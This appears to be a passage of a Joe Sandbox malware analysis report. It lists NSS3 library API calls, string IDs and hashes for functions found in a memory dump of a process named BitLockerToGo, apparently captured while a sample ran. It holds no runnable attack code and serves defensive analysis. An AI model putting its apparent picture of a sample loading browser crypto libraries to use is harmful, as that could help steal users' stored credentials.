                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C68781D,00000000,6C67BE2C,?,6C686B1D,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C40
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C68781D,?,6C67BE2C,?), ref: 6C686C58
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C68781D), ref: 6C686C6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C686C84
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C686C96
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C686C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C686CAA
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686F90
                                                                                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C686FC5
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6C686FF4
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                                                                                          • String ID: +`il
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1304971872-4003185054
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9b78e154e8a86001db495ad5d38dbf441c34a3be0b3393d40521d1903dc0b324
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 78fc50b1a31d891a66b2987e992a81fea0e48bbea3a589bd29cba980428a8a96
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b78e154e8a86001db495ad5d38dbf441c34a3be0b3393d40521d1903dc0b324
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B160B0E162099FDF00CFA5D849B9EBBB5BF09349F140024E815E7A40E735E916CBB9
                                                                                                                                                                                                                                                                                                                                                          Function 6C64DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C64DDDE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6487ED,00000800,6C63EF74,00000000), ref: 6C6A1000
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PR_NewLock.NSS3(?,00000800,6C63EF74,00000000), ref: 6C6A1016
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6487ED,00000008,?,00000800,6C63EF74,00000000), ref: 6C6A102B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C64DDF5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C64DE34
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C64DE93
                                                                                                                                                                                                                                                                                                                                                          • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C64DE9D
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C64DEB4
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C64DEC3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C64DED8
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s%s,?,?), ref: 6C64DEF0
                                                                                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C77AAF9,(NULL) (Validity Unknown)), ref: 6C64DF04
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C64DF13
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C64DF22
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C64DF33
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C64DF3C
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C64DF4B
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C64DF74
                                                                                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C64DF8E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bd144e15da9d5b0ba41fbdf4ef7437fd43b683bba3839611104d01067e1bc3dc
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 860958eed33ceed9550696c9e4fb24f69227acccde508b52be184e60d30fc148
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd144e15da9d5b0ba41fbdf4ef7437fd43b683bba3839611104d01067e1bc3dc
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B651B1B1E00105ABDB109F65DD45AAF7AB4EF85358F148429E809E7700EB31DD15CBE9
                                                                                                                                                                                                                                                                                                                                                          Function 6C6708F0 Relevance: 33.5, APIs: 13, Strings: 6, Instructions: 230COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6C67094D
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C670953
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001), ref: 6C67096E
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001), ref: 6C670974
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C67098F
                                                                                                                                                                                                                                                                                                                                                          • htonl.WSOCK32(-00000001,-00000001,-00000001,-00000001,-00000001,-00000001), ref: 6C670995
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C671860
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C6709BF), ref: 6C671897
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6718AA
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C671800: memcpy.VCRUNTIME140(?,?,?), ref: 6C6718C4
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C670B4F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C670B5E
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 6C670B6B
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,-00000001,-00000001), ref: 6C670B78
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: htonl$Item_Util$Zfreememcpy$AllocFreeK11_
                                                                                                                                                                                                                                                                                                                                                          • String ID: base_nonce$exp$info_hash$key$psk_id_hash$secret
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1637529542-763765719
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5ad1ea05a822f1a64fd25dfb5d0c0755d60592db44c156ffb630e6b1247e9fd0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b35c4495d788cc5d2924a7b63369d4855d8ab7f1d295690a9170931ca5777e88
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ad1ea05a822f1a64fd25dfb5d0c0755d60592db44c156ffb630e6b1247e9fd0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D9818976604305AFC710CF64C98099AF7E8FF8D708F048919F99897751E731EA19CBA6
                                                                                                                                                                                                                                                                                                                                                          Function 6C682D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C682DEC
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C682E00
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C682E2B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C682E43
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C,?,-00000001,00000000,?), ref: 6C682E74
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C654F1C,?,-00000001,00000000), ref: 6C682E88
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C682EC6
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C682EE4
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C682EF8
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C682F62
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C682F86
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C682F9E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C682FCA
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C68301A
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C68302E
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C683066
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C683085
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C6830EC
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C68310C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C683124
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C68314C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C669180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C69379E,?,6C669568,00000000,?,6C69379E,?,00000001,?), ref: 6C66918D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C669180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C69379E,?,6C669568,00000000,?,6C69379E,?,00000001,?), ref: 6C6691A0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C68316D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5e88da1bcd49a876dd9c156c4ca07f07a478f44d5a29fc0990dc40ab4ae14543
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 485478227261115a11dc05ddc9e8c71080e9fc3f64d4925236814458ed3302f7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e88da1bcd49a876dd9c156c4ca07f07a478f44d5a29fc0990dc40ab4ae14543
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87F17FB1D01209AFDF00DF64D888B9EBBB5BF0A318F144169EC05A7711EB31E995CBA5
                                                                                                                                                                                                                                                                                                                                                          Function 6C684C20 Relevance: 30.3, APIs: 20, Instructions: 290memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C684C4C
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C684C60
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CA1
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C684CBE
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CD2
                                                                                                                                                                                                                                                                                                                                                          • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684D3A
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684D4F
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684DB7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C684DD7
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C684DEC
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C684E1B
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C684E2F
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684E5A
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C684E71
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C684E7A
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C684EA2
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C684EC1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C684ED6
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C684F01
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C684F2A
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 759471828-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e535f8019fd59a22323c29dca1278016d95ec8dbe3b89c658f5e683643b51ea0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d9c0b3c10086008ea879e93c136efb97c2e4ff77f8b3ebff3aa7d7956307fc5f
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e535f8019fd59a22323c29dca1278016d95ec8dbe3b89c658f5e683643b51ea0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51B13471A012059FDF00DF68D888BAA77B8BF4A318F044179ED0597B00EB70E965CBE9
                                                                                                                                                                                                                                                                                                                                                          Function 6C6D6E90 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 305fileCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(SSLKEYLOGFILE,?,6C6D6BF7), ref: 6C6D6EB6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: TlsGetValue.KERNEL32(00000040,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631267
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: EnterCriticalSection.KERNEL32(?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C63127C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C631240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C63116C,NSPR_LOG_MODULES), ref: 6C631291
